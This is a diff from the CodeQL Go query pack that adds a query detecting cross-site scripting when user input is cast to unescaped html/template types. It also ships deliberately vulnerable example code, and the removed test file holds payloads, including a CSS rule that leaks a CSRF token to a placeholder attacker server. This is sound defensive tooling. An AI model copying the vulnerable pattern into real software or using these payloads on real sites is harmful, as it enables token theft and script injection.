## 1.2.0
|
||||
|
||||
### Query Metadata Changes
|
||||
|
||||
@@ -8,7 +8,7 @@
|
||||
that allow values to be rendered as-is in the template, avoiding the escaping that all the other strings go
|
||||
through.
|
||||
</p>
|
||||
<p>Using them on user-provided values will result in an opportunity for XSS.</p>
|
||||
<p>Using them on user-provided values allows for a cross-site scripting vulnerability.</p>
|
||||
</overview>
|
||||
<recommendation>
|
||||
<p>
|
||||
@@ -19,10 +19,10 @@
|
||||
<p>
|
||||
In the first example you can see the special types and how they are used in a template:
|
||||
</p>
|
||||
<sample src="HTMLTemplateEscapingPassthroughBad.go" />
|
||||
<sample src="HtmlTemplateEscapingBypassXssBad.go" />
|
||||
<p>
|
||||
To avoid XSS, all user input should be a normal string type.
|
||||
</p>
|
||||
<sample src="HTMLTemplateEscapingPassthroughGood.go" />
|
||||
<sample src="HtmlTemplateEscapingBypassXssGood.go" />
|
||||
</example>
|
||||
</qhelp>
|
||||
119
go/ql/src/Security/CWE-079/HtmlTemplateEscapingBypassXss.ql
Normal file
119
go/ql/src/Security/CWE-079/HtmlTemplateEscapingBypassXss.ql
Normal file
@@ -0,0 +1,119 @@
|
||||
/**
|
||||
* @name Cross-site scripting via HTML template escaping bypass
|
||||
* @description Converting user input to a special type that avoids escaping
|
||||
* when fed into an HTML template allows for a cross-site
|
||||
* scripting vulnerability.
|
||||
* @kind path-problem
|
||||
* @problem.severity error
|
||||
* @security-severity 6.1
|
||||
* @precision high
|
||||
* @id go/html-template-escaping-bypass-xss
|
||||
* @tags security
|
||||
* external/cwe/cwe-079
|
||||
* external/cwe/cwe-116
|
||||
*/
|
||||
|
||||
import go
|
||||
|
||||
/**
|
||||
* A type that will not be escaped when passed to a `html/template` template.
|
||||
*/
|
||||
class UnescapedType extends Type {
|
||||
UnescapedType() {
|
||||
this.hasQualifiedName("html/template",
|
||||
["CSS", "HTML", "HTMLAttr", "JS", "JSStr", "Srcset", "URL"])
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Holds if the sink is a data value argument of a template execution call.
|
||||
*
|
||||
* Note that this is slightly more general than
|
||||
* `SharedXss::HtmlTemplateSanitizer` because it uses `Function.getACall()`,
|
||||
* which finds calls through interfaces which the receiver implements. This
|
||||
* finds more results in practice.
|
||||
*/
|
||||
predicate isSinkToTemplateExec(DataFlow::Node sink) {
|
||||
exists(Method fn, string methodName, DataFlow::CallNode call |
|
||||
fn.hasQualifiedName("html/template", "Template", methodName) and
|
||||
call = fn.getACall()
|
||||
|
|
||||
methodName = "Execute" and sink = call.getArgument(1)
|
||||
or
|
||||
methodName = "ExecuteTemplate" and sink = call.getArgument(2)
|
||||
)
|
||||
}
|
||||
|
||||
/**
|
||||
* Data flow configuration that tracks flows from untrusted sources to template execution calls
|
||||
* which go through a conversion to an unescaped type.
|
||||
*/
|
||||
module UntrustedToTemplateExecWithConversionConfig implements DataFlow::StateConfigSig {
|
||||
private newtype TConversionState =
|
||||
TUnconverted() or
|
||||
TConverted(UnescapedType unescapedType)
|
||||
|
||||
/**
|
||||
* The flow state for tracking whether a conversion to an unescaped type has
|
||||
* occurred.
|
||||
*/
|
||||
class FlowState extends TConversionState {
|
||||
predicate isBeforeConversion() { this instanceof TUnconverted }
|
||||
|
||||
predicate isAfterConversion(UnescapedType unescapedType) { this = TConverted(unescapedType) }
|
||||
|
||||
/** Gets a textual representation of this element. */
|
||||
string toString() {
|
||||
this.isBeforeConversion() and result = "Unconverted"
|
||||
or
|
||||
exists(UnescapedType unescapedType | this.isAfterConversion(unescapedType) |
|
||||
result = "Converted to " + unescapedType.getQualifiedName()
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
predicate isSource(DataFlow::Node source, FlowState state) {
|
||||
state.isBeforeConversion() and source instanceof ActiveThreatModelSource
|
||||
}
|
||||
|
||||
predicate isSink(DataFlow::Node sink, FlowState state) {
|
||||
state.isAfterConversion(_) and isSinkToTemplateExec(sink)
|
||||
}
|
||||
|
||||
predicate isBarrier(DataFlow::Node node) {
|
||||
node instanceof SharedXss::Sanitizer and not node instanceof SharedXss::HtmlTemplateSanitizer
|
||||
or
|
||||
node.getType() instanceof NumericType
|
||||
}
|
||||
|
||||
/**
|
||||
* When a conversion to a passthrough type is encountered, transition the flow state.
|
||||
*/
|
||||
predicate isAdditionalFlowStep(
|
||||
DataFlow::Node pred, FlowState predState, DataFlow::Node succ, FlowState succState
|
||||
) {
|
||||
exists(ConversionExpr conversion, UnescapedType unescapedType |
|
||||
// If not yet converted, look for a conversion to a passthrough type
|
||||
predState.isBeforeConversion() and
|
||||
succState.isAfterConversion(unescapedType) and
|
||||
succ.(DataFlow::TypeCastNode).getExpr() = conversion and
|
||||
pred.asExpr() = conversion.getOperand() and
|
||||
conversion.getType().getUnderlyingType*() = unescapedType
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
module UntrustedToTemplateExecWithConversionFlow =
|
||||
TaintTracking::GlobalWithState<UntrustedToTemplateExecWithConversionConfig>;
|
||||
|
||||
import UntrustedToTemplateExecWithConversionFlow::PathGraph
|
||||
|
||||
from
|
||||
UntrustedToTemplateExecWithConversionFlow::PathNode untrustedSource,
|
||||
UntrustedToTemplateExecWithConversionFlow::PathNode templateExecCall, UnescapedType unescapedType
|
||||
where
|
||||
UntrustedToTemplateExecWithConversionFlow::flowPath(untrustedSource, templateExecCall) and
|
||||
templateExecCall.getState().isAfterConversion(unescapedType)
|
||||
select templateExecCall.getNode(), untrustedSource, templateExecCall,
|
||||
"Data from an $@ will not be auto-escaped because it was converted to template." +
|
||||
unescapedType.getName(), untrustedSource.getNode(), "untrusted source"
|
||||
13
go/ql/src/Security/CWE-079/HtmlTemplateEscapingBypassXssBad.go
Executable file
13
go/ql/src/Security/CWE-079/HtmlTemplateEscapingBypassXssBad.go
Executable file
@@ -0,0 +1,13 @@
|
||||
package main
|
||||
|
||||
import (
|
||||
"html/template"
|
||||
"net/http"
|
||||
)
|
||||
|
||||
func bad(w http.ResponseWriter, r *http.Request) {
|
||||
r.ParseForm()
|
||||
username := r.Form.Get("username")
|
||||
tmpl, _ := template.New("test").Parse(`<b>Hi {{.}}</b>`)
|
||||
tmpl.Execute(w, template.HTML(username))
|
||||
}
|
||||
13
go/ql/src/Security/CWE-079/HtmlTemplateEscapingBypassXssGood.go
Executable file
13
go/ql/src/Security/CWE-079/HtmlTemplateEscapingBypassXssGood.go
Executable file
@@ -0,0 +1,13 @@
|
||||
package main
|
||||
|
||||
import (
|
||||
"html/template"
|
||||
"net/http"
|
||||
)
|
||||
|
||||
func good(w http.ResponseWriter, r *http.Request) {
|
||||
r.ParseForm()
|
||||
username := r.Form.Get("username")
|
||||
tmpl, _ := template.New("test").Parse(`<b>Hi {{.}}</b>`)
|
||||
tmpl.Execute(w, username)
|
||||
}
|
||||
@@ -2,12 +2,12 @@ package main
|
||||
|
||||
import (
|
||||
"io"
|
||||
"io/ioutil"
|
||||
"net/http"
|
||||
"os"
|
||||
)
|
||||
|
||||
func ListFiles(w http.ResponseWriter, r *http.Request) {
|
||||
files, _ := ioutil.ReadDir(".")
|
||||
files, _ := os.ReadDir(".")
|
||||
|
||||
for _, file := range files {
|
||||
io.WriteString(w, file.Name()+"\n")
|
||||
|
||||
@@ -3,12 +3,12 @@ package main
|
||||
import (
|
||||
"html"
|
||||
"io"
|
||||
"io/ioutil"
|
||||
"net/http"
|
||||
"os"
|
||||
)
|
||||
|
||||
func ListFiles1(w http.ResponseWriter, r *http.Request) {
|
||||
files, _ := ioutil.ReadDir(".")
|
||||
files, _ := os.ReadDir(".")
|
||||
|
||||
for _, file := range files {
|
||||
io.WriteString(w, html.EscapeString(file.Name())+"\n")
|
||||
|
||||
@@ -1,4 +1,5 @@
|
||||
---
|
||||
category: minorAnalysis
|
||||
---
|
||||
## 1.2.1
|
||||
|
||||
### Minor Analysis Improvements
|
||||
|
||||
* The query `go/hardcoded-credentials` has been removed from all query suites.
|
||||
5
go/ql/src/change-notes/released/1.3.0.md
Normal file
5
go/ql/src/change-notes/released/1.3.0.md
Normal file
@@ -0,0 +1,5 @@
|
||||
## 1.3.0
|
||||
|
||||
### New Queries
|
||||
|
||||
* Query (`go/html-template-escaping-bypass-xss`) has been promoted to the main query suite. This query finds potential cross-site scripting (XSS) vulnerabilities when using the `html/template` package, caused by user input being cast to a type which bypasses the HTML autoescaping. It was originally contributed to the experimental query pack by @gagliardetto in <https://github.com/github/codeql-go/pull/493>.
|
||||
@@ -1,2 +1,2 @@
|
||||
---
|
||||
lastReleaseVersion: 1.2.0
|
||||
lastReleaseVersion: 1.3.0
|
||||
|
||||
@@ -1,153 +0,0 @@
|
||||
/**
|
||||
* @name HTML template escaping passthrough
|
||||
* @description If a user-provided value is converted to a special type that avoids escaping when fed into a HTML
|
||||
* template, it may result in XSS.
|
||||
* @kind path-problem
|
||||
* @problem.severity warning
|
||||
* @id go/html-template-escaping-passthrough
|
||||
* @tags security
|
||||
* experimental
|
||||
* external/cwe/cwe-079
|
||||
*/
|
||||
|
||||
import go
|
||||
|
||||
/**
|
||||
* Holds if the provided `untrusted` node flows into a conversion to a PassthroughType.
|
||||
* The `targetType` parameter gets populated with the name of the PassthroughType,
|
||||
* and `conversionSink` gets populated with the node where the conversion happens.
|
||||
*/
|
||||
predicate flowsFromUntrustedToConversion(
|
||||
DataFlow::Node untrusted, PassthroughTypeName targetType, DataFlow::Node conversionSink
|
||||
) {
|
||||
exists(DataFlow::Node source |
|
||||
UntrustedToPassthroughTypeConversionFlow::flow(source, conversionSink) and
|
||||
source = untrusted and
|
||||
UntrustedToPassthroughTypeConversionConfig::isSinkToPassthroughType(conversionSink, targetType)
|
||||
)
|
||||
}
|
||||
|
||||
/**
|
||||
* A name of a type that will not be escaped when passed to
|
||||
* a `html/template` template.
|
||||
*/
|
||||
class PassthroughTypeName extends string {
|
||||
PassthroughTypeName() { this = ["HTML", "HTMLAttr", "JS", "JSStr", "CSS", "Srcset", "URL"] }
|
||||
}
|
||||
|
||||
module UntrustedToPassthroughTypeConversionConfig implements DataFlow::ConfigSig {
|
||||
predicate isSource(DataFlow::Node source) { source instanceof ActiveThreatModelSource }
|
||||
|
||||
additional predicate isSinkToPassthroughType(DataFlow::TypeCastNode sink, PassthroughTypeName name) {
|
||||
exists(Type typ |
|
||||
typ = sink.getResultType() and
|
||||
typ.getUnderlyingType*().hasQualifiedName("html/template", name)
|
||||
)
|
||||
}
|
||||
|
||||
predicate isSink(DataFlow::Node sink) { isSinkToPassthroughType(sink, _) }
|
||||
|
||||
predicate isBarrier(DataFlow::Node node) {
|
||||
node instanceof SharedXss::Sanitizer or node.getType() instanceof NumericType
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Tracks taint flow for reasoning about when a `ActiveThreatModelSource` is
|
||||
* converted into a special "passthrough" type which will not be escaped by the
|
||||
* template generator; this allows the injection of arbitrary content (html,
|
||||
* css, js) into the generated output of the templates.
|
||||
*/
|
||||
module UntrustedToPassthroughTypeConversionFlow =
|
||||
TaintTracking::Global<UntrustedToPassthroughTypeConversionConfig>;
|
||||
|
||||
/**
|
||||
* Holds if the provided `conversion` node flows into the provided `execSink`.
|
||||
*/
|
||||
predicate flowsFromConversionToExec(
|
||||
DataFlow::Node conversion, PassthroughTypeName targetType, DataFlow::Node execSink
|
||||
) {
|
||||
PassthroughTypeConversionToTemplateExecutionCallFlow::flow(conversion, execSink) and
|
||||
PassthroughTypeConversionToTemplateExecutionCallConfig::isSourceConversionToPassthroughType(conversion,
|
||||
targetType)
|
||||
}
|
||||
|
||||
module PassthroughTypeConversionToTemplateExecutionCallConfig implements DataFlow::ConfigSig {
|
||||
predicate isSource(DataFlow::Node source) { isSourceConversionToPassthroughType(source, _) }
|
||||
|
||||
additional predicate isSourceConversionToPassthroughType(
|
||||
DataFlow::TypeCastNode source, PassthroughTypeName name
|
||||
) {
|
||||
exists(Type typ |
|
||||
typ = source.getResultType() and
|
||||
typ.getUnderlyingType*().hasQualifiedName("html/template", name)
|
||||
)
|
||||
}
|
||||
|
||||
predicate isSink(DataFlow::Node sink) { isSinkToTemplateExec(sink, _) }
|
||||
}
|
||||
|
||||
/**
|
||||
* Tracks taint flow for reasoning about when the result of a conversion to a
|
||||
* PassthroughType flows to a template execution call.
|
||||
*/
|
||||
module PassthroughTypeConversionToTemplateExecutionCallFlow =
|
||||
TaintTracking::Global<PassthroughTypeConversionToTemplateExecutionCallConfig>;
|
||||
|
||||
/**
|
||||
* Holds if the sink is a data value argument of a template execution call.
|
||||
*/
|
||||
predicate isSinkToTemplateExec(DataFlow::Node sink, DataFlow::CallNode call) {
|
||||
exists(Method fn, string methodName |
|
||||
fn.hasQualifiedName("html/template", "Template", methodName) and
|
||||
call = fn.getACall()
|
||||
|
|
||||
methodName = "Execute" and sink = call.getArgument(1)
|
||||
or
|
||||
methodName = "ExecuteTemplate" and sink = call.getArgument(2)
|
||||
)
|
||||
}
|
||||
|
||||
module FromUntrustedToTemplateExecutionCallConfig implements DataFlow::ConfigSig {
|
||||
predicate isSource(DataFlow::Node source) { source instanceof ActiveThreatModelSource }
|
||||
|
||||
predicate isSink(DataFlow::Node sink) { isSinkToTemplateExec(sink, _) }
|
||||
}
|
||||
|
||||
/**
|
||||
* Tracks taint flow from a `ActiveThreatModelSource` into a template executor
|
||||
* call.
|
||||
*/
|
||||
module FromUntrustedToTemplateExecutionCallFlow =
|
||||
TaintTracking::Global<FromUntrustedToTemplateExecutionCallConfig>;
|
||||
|
||||
import FromUntrustedToTemplateExecutionCallFlow::PathGraph
|
||||
|
||||
/**
|
||||
* Holds if the provided `untrusted` node flows into the provided `execSink`.
|
||||
*/
|
||||
predicate flowsFromUntrustedToExec(
|
||||
FromUntrustedToTemplateExecutionCallFlow::PathNode untrusted,
|
||||
FromUntrustedToTemplateExecutionCallFlow::PathNode execSink
|
||||
) {
|
||||
FromUntrustedToTemplateExecutionCallFlow::flowPath(untrusted, execSink)
|
||||
}
|
||||
|
||||
from
|
||||
FromUntrustedToTemplateExecutionCallFlow::PathNode untrustedSource,
|
||||
FromUntrustedToTemplateExecutionCallFlow::PathNode templateExecCall,
|
||||
PassthroughTypeName targetTypeName, DataFlow::Node conversion
|
||||
where
|
||||
// A = untrusted remote flow source
|
||||
// B = conversion to PassthroughType
|
||||
// C = template execution call
|
||||
// Flows:
|
||||
// A -> B
|
||||
flowsFromUntrustedToConversion(untrustedSource.getNode(), targetTypeName, conversion) and
|
||||
// B -> C
|
||||
flowsFromConversionToExec(conversion, targetTypeName, templateExecCall.getNode()) and
|
||||
// A -> C
|
||||
flowsFromUntrustedToExec(untrustedSource, templateExecCall)
|
||||
select templateExecCall.getNode(), untrustedSource, templateExecCall,
|
||||
"Data from an $@ will not be auto-escaped because it was $@ to template." + targetTypeName,
|
||||
untrustedSource.getNode(), "untrusted source", conversion, "converted"
|
||||
@@ -1,70 +0,0 @@
|
||||
package main
|
||||
|
||||
import (
|
||||
"html/template"
|
||||
"os"
|
||||
)
|
||||
|
||||
func main() {}
|
||||
func source(s string) string {
|
||||
return s
|
||||
}
|
||||
|
||||
type HTMLAlias = template.HTML
|
||||
|
||||
func checkError(err error) {
|
||||
if err != nil {
|
||||
panic(err)
|
||||
}
|
||||
}
|
||||
|
||||
// bad is an example of a bad implementation
|
||||
func bad() {
|
||||
tmpl, _ := template.New("test").Parse(`Hi {{.}}\n`)
|
||||
tmplTag, _ := template.New("test").Parse(`Hi <b {{.}}></b>\n`)
|
||||
tmplScript, _ := template.New("test").Parse(`<script> eval({{.}}) </script>`)
|
||||
tmplSrcset, _ := template.New("test").Parse(`<img srcset="{{.}}"/>`)
|
||||
|
||||
{
|
||||
{
|
||||
var a = template.HTML(source(`<a href='example.com'>link</a>`))
|
||||
checkError(tmpl.Execute(os.Stdout, a))
|
||||
}
|
||||
{
|
||||
{
|
||||
var a template.HTML
|
||||
a = template.HTML(source(`<a href='example.com'>link</a>`))
|
||||
checkError(tmpl.Execute(os.Stdout, a))
|
||||
}
|
||||
{
|
||||
var a HTMLAlias
|
||||
a = HTMLAlias(source(`<a href='example.com'>link</a>`))
|
||||
checkError(tmpl.Execute(os.Stdout, a))
|
||||
}
|
||||
}
|
||||
}
|
||||
{
|
||||
var c = template.HTMLAttr(source(`href="https://example.com"`))
|
||||
checkError(tmplTag.Execute(os.Stdout, c))
|
||||
}
|
||||
{
|
||||
var d = template.JS(source("alert({hello: 'world'})"))
|
||||
checkError(tmplScript.Execute(os.Stdout, d))
|
||||
}
|
||||
{
|
||||
var e = template.JSStr(source("setTimeout('alert()')"))
|
||||
checkError(tmplScript.Execute(os.Stdout, e))
|
||||
}
|
||||
{
|
||||
var b = template.CSS(source("input[name='csrftoken'][value^='b'] { background: url(//ATTACKER-SERVER/leak/b); } "))
|
||||
checkError(tmpl.Execute(os.Stdout, b))
|
||||
}
|
||||
{
|
||||
var f = template.Srcset(source(`evil.jpg 320w`))
|
||||
checkError(tmplSrcset.Execute(os.Stdout, f))
|
||||
}
|
||||
{
|
||||
var g = template.URL(source("javascript:alert(1)"))
|
||||
checkError(tmpl.Execute(os.Stdout, g))
|
||||
}
|
||||
}
|
||||
@@ -1,15 +0,0 @@
|
||||
package main
|
||||
|
||||
import (
|
||||
"html/template"
|
||||
"os"
|
||||
)
|
||||
|
||||
// good is an example of a good implementation
|
||||
func good() {
|
||||
tmpl, _ := template.New("test").Parse(`Hello, {{.}}\n`)
|
||||
{ // This will be escaped:
|
||||
var escaped = source(`<a href="example.com">link</a>`)
|
||||
checkError(tmpl.Execute(os.Stdout, escaped))
|
||||
}
|
||||
}
|
||||
@@ -1,5 +1,5 @@
|
||||
name: codeql/go-queries
|
||||
version: 1.2.1-dev
|
||||
version: 1.3.1-dev
|
||||
groups:
|
||||
- go
|
||||
- queries
|
||||
|
||||
@@ -1,76 +0,0 @@
|
||||
#select
|
||||
| HTMLTemplateEscapingPassthrough.go:30:39:30:39 | a | HTMLTemplateEscapingPassthrough.go:29:26:29:40 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:30:39:30:39 | a | Data from an $@ will not be auto-escaped because it was $@ to template.HTML | HTMLTemplateEscapingPassthrough.go:29:26:29:40 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:29:12:29:41 | type conversion | converted |
|
||||
| HTMLTemplateEscapingPassthrough.go:36:40:36:40 | a | HTMLTemplateEscapingPassthrough.go:35:23:35:37 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:36:40:36:40 | a | Data from an $@ will not be auto-escaped because it was $@ to template.HTML | HTMLTemplateEscapingPassthrough.go:35:23:35:37 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:35:9:35:38 | type conversion | converted |
|
||||
| HTMLTemplateEscapingPassthrough.go:41:40:41:40 | a | HTMLTemplateEscapingPassthrough.go:40:19:40:33 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:41:40:41:40 | a | Data from an $@ will not be auto-escaped because it was $@ to template.HTML | HTMLTemplateEscapingPassthrough.go:40:19:40:33 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:40:9:40:34 | type conversion | converted |
|
||||
| HTMLTemplateEscapingPassthrough.go:47:41:47:41 | c | HTMLTemplateEscapingPassthrough.go:46:29:46:43 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:47:41:47:41 | c | Data from an $@ will not be auto-escaped because it was $@ to template.HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:29:46:43 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:46:11:46:44 | type conversion | converted |
|
||||
| HTMLTemplateEscapingPassthrough.go:51:44:51:44 | d | HTMLTemplateEscapingPassthrough.go:50:23:50:37 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:51:44:51:44 | d | Data from an $@ will not be auto-escaped because it was $@ to template.JS | HTMLTemplateEscapingPassthrough.go:50:23:50:37 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:50:11:50:38 | type conversion | converted |
|
||||
| HTMLTemplateEscapingPassthrough.go:55:44:55:44 | e | HTMLTemplateEscapingPassthrough.go:54:26:54:40 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:55:44:55:44 | e | Data from an $@ will not be auto-escaped because it was $@ to template.JSStr | HTMLTemplateEscapingPassthrough.go:54:26:54:40 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:54:11:54:41 | type conversion | converted |
|
||||
| HTMLTemplateEscapingPassthrough.go:59:38:59:38 | b | HTMLTemplateEscapingPassthrough.go:58:24:58:38 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:59:38:59:38 | b | Data from an $@ will not be auto-escaped because it was $@ to template.CSS | HTMLTemplateEscapingPassthrough.go:58:24:58:38 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:58:11:58:39 | type conversion | converted |
|
||||
| HTMLTemplateEscapingPassthrough.go:63:44:63:44 | f | HTMLTemplateEscapingPassthrough.go:62:27:62:41 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:63:44:63:44 | f | Data from an $@ will not be auto-escaped because it was $@ to template.Srcset | HTMLTemplateEscapingPassthrough.go:62:27:62:41 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:62:11:62:42 | type conversion | converted |
|
||||
| HTMLTemplateEscapingPassthrough.go:67:38:67:38 | g | HTMLTemplateEscapingPassthrough.go:66:24:66:38 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:67:38:67:38 | g | Data from an $@ will not be auto-escaped because it was $@ to template.URL | HTMLTemplateEscapingPassthrough.go:66:24:66:38 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:66:11:66:39 | type conversion | converted |
|
||||
edges
|
||||
| HTMLTemplateEscapingPassthrough.go:29:12:29:41 | type conversion | HTMLTemplateEscapingPassthrough.go:30:39:30:39 | a | provenance | |
|
||||
| HTMLTemplateEscapingPassthrough.go:29:26:29:40 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:29:12:29:41 | type conversion | provenance | Src:MaD:1 |
|
||||
| HTMLTemplateEscapingPassthrough.go:35:9:35:38 | type conversion | HTMLTemplateEscapingPassthrough.go:36:40:36:40 | a | provenance | |
|
||||
| HTMLTemplateEscapingPassthrough.go:35:23:35:37 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:35:9:35:38 | type conversion | provenance | Src:MaD:1 |
|
||||
| HTMLTemplateEscapingPassthrough.go:40:9:40:34 | type conversion | HTMLTemplateEscapingPassthrough.go:41:40:41:40 | a | provenance | |
|
||||
| HTMLTemplateEscapingPassthrough.go:40:19:40:33 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:40:9:40:34 | type conversion | provenance | Src:MaD:1 |
|
||||
| HTMLTemplateEscapingPassthrough.go:46:11:46:44 | type conversion | HTMLTemplateEscapingPassthrough.go:47:41:47:41 | c | provenance | |
|
||||
| HTMLTemplateEscapingPassthrough.go:46:29:46:43 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:46:11:46:44 | type conversion | provenance | Src:MaD:1 |
|
||||
| HTMLTemplateEscapingPassthrough.go:50:11:50:38 | type conversion | HTMLTemplateEscapingPassthrough.go:51:44:51:44 | d | provenance | |
|
||||
| HTMLTemplateEscapingPassthrough.go:50:23:50:37 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:50:11:50:38 | type conversion | provenance | Src:MaD:1 |
|
||||
| HTMLTemplateEscapingPassthrough.go:54:11:54:41 | type conversion | HTMLTemplateEscapingPassthrough.go:55:44:55:44 | e | provenance | |
|
||||
| HTMLTemplateEscapingPassthrough.go:54:26:54:40 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:54:11:54:41 | type conversion | provenance | Src:MaD:1 |
|
||||
| HTMLTemplateEscapingPassthrough.go:58:11:58:39 | type conversion | HTMLTemplateEscapingPassthrough.go:59:38:59:38 | b | provenance | |
|
||||
| HTMLTemplateEscapingPassthrough.go:58:24:58:38 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:58:11:58:39 | type conversion | provenance | Src:MaD:1 |
|
||||
| HTMLTemplateEscapingPassthrough.go:62:11:62:42 | type conversion | HTMLTemplateEscapingPassthrough.go:63:44:63:44 | f | provenance | |
|
||||
| HTMLTemplateEscapingPassthrough.go:62:27:62:41 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:62:11:62:42 | type conversion | provenance | Src:MaD:1 |
|
||||
| HTMLTemplateEscapingPassthrough.go:66:11:66:39 | type conversion | HTMLTemplateEscapingPassthrough.go:67:38:67:38 | g | provenance | |
|
||||
| HTMLTemplateEscapingPassthrough.go:66:24:66:38 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:66:11:66:39 | type conversion | provenance | Src:MaD:1 |
|
||||
| HTMLTemplateEscapingPassthrough.go:75:17:75:31 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:76:38:76:44 | escaped | provenance | Src:MaD:1 |
|
||||
| HTMLTemplateEscapingPassthrough.go:81:10:81:24 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:84:38:84:40 | src | provenance | Src:MaD:1 |
|
||||
| HTMLTemplateEscapingPassthrough.go:89:10:89:24 | call to UserAgent | HTMLTemplateEscapingPassthrough.go:91:64:91:66 | src | provenance | Src:MaD:1 |
|
||||
| HTMLTemplateEscapingPassthrough.go:91:16:91:77 | type conversion | HTMLTemplateEscapingPassthrough.go:92:38:92:46 | converted | provenance | |
|
||||
| HTMLTemplateEscapingPassthrough.go:91:38:91:67 | call to HTMLEscapeString | HTMLTemplateEscapingPassthrough.go:91:16:91:77 | type conversion | provenance | |
|
||||
| HTMLTemplateEscapingPassthrough.go:91:64:91:66 | src | HTMLTemplateEscapingPassthrough.go:91:38:91:67 | call to HTMLEscapeString | provenance | MaD:2 |
|
||||
models
|
||||
| 1 | Source: net/http; Request; true; UserAgent; ; ; ReturnValue; remote; manual |
|
||||
| 2 | Summary: html/template; ; false; HTMLEscapeString; ; ; Argument[0]; ReturnValue; taint; manual |
|
||||
nodes
|
||||
| HTMLTemplateEscapingPassthrough.go:29:12:29:41 | type conversion | semmle.label | type conversion |
|
||||
| HTMLTemplateEscapingPassthrough.go:29:26:29:40 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HTMLTemplateEscapingPassthrough.go:30:39:30:39 | a | semmle.label | a |
|
||||
| HTMLTemplateEscapingPassthrough.go:35:9:35:38 | type conversion | semmle.label | type conversion |
|
||||
| HTMLTemplateEscapingPassthrough.go:35:23:35:37 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HTMLTemplateEscapingPassthrough.go:36:40:36:40 | a | semmle.label | a |
|
||||
| HTMLTemplateEscapingPassthrough.go:40:9:40:34 | type conversion | semmle.label | type conversion |
|
||||
| HTMLTemplateEscapingPassthrough.go:40:19:40:33 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HTMLTemplateEscapingPassthrough.go:41:40:41:40 | a | semmle.label | a |
|
||||
| HTMLTemplateEscapingPassthrough.go:46:11:46:44 | type conversion | semmle.label | type conversion |
|
||||
| HTMLTemplateEscapingPassthrough.go:46:29:46:43 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HTMLTemplateEscapingPassthrough.go:47:41:47:41 | c | semmle.label | c |
|
||||
| HTMLTemplateEscapingPassthrough.go:50:11:50:38 | type conversion | semmle.label | type conversion |
|
||||
| HTMLTemplateEscapingPassthrough.go:50:23:50:37 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HTMLTemplateEscapingPassthrough.go:51:44:51:44 | d | semmle.label | d |
|
||||
| HTMLTemplateEscapingPassthrough.go:54:11:54:41 | type conversion | semmle.label | type conversion |
|
||||
| HTMLTemplateEscapingPassthrough.go:54:26:54:40 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HTMLTemplateEscapingPassthrough.go:55:44:55:44 | e | semmle.label | e |
|
||||
| HTMLTemplateEscapingPassthrough.go:58:11:58:39 | type conversion | semmle.label | type conversion |
|
||||
| HTMLTemplateEscapingPassthrough.go:58:24:58:38 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HTMLTemplateEscapingPassthrough.go:59:38:59:38 | b | semmle.label | b |
|
||||
| HTMLTemplateEscapingPassthrough.go:62:11:62:42 | type conversion | semmle.label | type conversion |
|
||||
| HTMLTemplateEscapingPassthrough.go:62:27:62:41 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HTMLTemplateEscapingPassthrough.go:63:44:63:44 | f | semmle.label | f |
|
||||
| HTMLTemplateEscapingPassthrough.go:66:11:66:39 | type conversion | semmle.label | type conversion |
|
||||
| HTMLTemplateEscapingPassthrough.go:66:24:66:38 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HTMLTemplateEscapingPassthrough.go:67:38:67:38 | g | semmle.label | g |
|
||||
| HTMLTemplateEscapingPassthrough.go:75:17:75:31 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HTMLTemplateEscapingPassthrough.go:76:38:76:44 | escaped | semmle.label | escaped |
|
||||
| HTMLTemplateEscapingPassthrough.go:81:10:81:24 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HTMLTemplateEscapingPassthrough.go:84:38:84:40 | src | semmle.label | src |
|
||||
| HTMLTemplateEscapingPassthrough.go:89:10:89:24 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HTMLTemplateEscapingPassthrough.go:91:16:91:77 | type conversion | semmle.label | type conversion |
|
||||
| HTMLTemplateEscapingPassthrough.go:91:38:91:67 | call to HTMLEscapeString | semmle.label | call to HTMLEscapeString |
|
||||
| HTMLTemplateEscapingPassthrough.go:91:64:91:66 | src | semmle.label | src |
|
||||
